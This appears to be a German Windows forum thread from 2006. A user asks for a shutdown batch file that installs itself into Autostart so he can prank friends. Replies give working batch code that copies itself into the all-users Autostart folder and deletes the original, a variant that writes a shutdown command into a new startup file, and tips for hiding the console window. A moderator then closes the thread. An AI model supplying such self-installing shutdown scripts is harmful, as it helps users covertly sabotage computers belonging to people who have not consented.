Shutdown.bat mit autostart

Dieses Thema im Forum "Windows" wurde erstellt von Geismann, 31. August 2006 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 31. August 2006
    Moin Leutz

    kann mir jemand sagen wie ich eine shutdown.bat machen die sich automatisch beim öffnen in den Autostart setzt. Man kann eine solche Datei ja von Hand dort rein machen aber kann man die bat Datei auch so machen das dies automatisch geschieht.

    Will nämlich nen paar Freunden ne Lektion ersteilen :D

    Also würde mich über eine Antwort freuen.

    10er is sicher

    Mfg Geismann
     

  2. Anzeige
  3. #2 31. August 2006
    google? erster Treffer von google:

    Code:
    xcopy %0 "%ALLUSERSPROFILE%\Startmenü\Programme\Autostart\"
    del %0
    sollte funktionieren...
    %0 is immer der Dateiname der Bat. (somit ist es egal wie sie heißt)
    Das del %0 löscht die ursprüngliche Bat.
    %ALLUSERSPROFILE% - trifft für nalle benutzer zu, ansonsten %USERSPROFILE% für den aktuellen

    greetz blackbone

    btw das könnte bereits als hacking-request gewertet werden..

    //edit achja
    jetzt würde die Datei sich aber bei jedem autostart noch einmal selbst dorthin verschieben (bisschen sinnlos^^)
    Besser wäre es eine neue .bat zuerstellen und dort die gewünschten Befehle eintragen. z.b so:
    Code:
    echo "shutdown Befehl" >"%ALLUSERSPROFILE%\Startmenü\Programme\Autostart\neue.bat"
    del %0"
     
  4. #3 31. August 2006
    Und das "@Echo off" am Anfang der Bat nicht vergessen, sonst stehen dort immer brav die ausgeführten Probleme.

    Alternativ gibt es auch Tools die ein aufpoppen der Eingabeaufforderung unterbinden (Stealtbat oder so ähnlich)
     
  5. #4 31. August 2006
    Benutze dazu bitte die SuFu.
    In H&S gibt es sogar ein TUT dazu^^

    ~~closed~~

    mfg KillerKarnickel
     

  6. Videos zum Thema
Die Seite wird geladen...
Similar Threads - Shutdown bat autostart
  1. Antworten:
    2
    Aufrufe:
    511
  2. Antworten:
    1
    Aufrufe:
    456
  3. Antworten:
    2
    Aufrufe:
    1.049
  4. Antworten:
    7
    Aufrufe:
    698
  5. [XP] Shutdown.bat

    BlueICE , 13. März 2010 , im Forum: Windows
    Antworten:
    8
    Aufrufe:
    826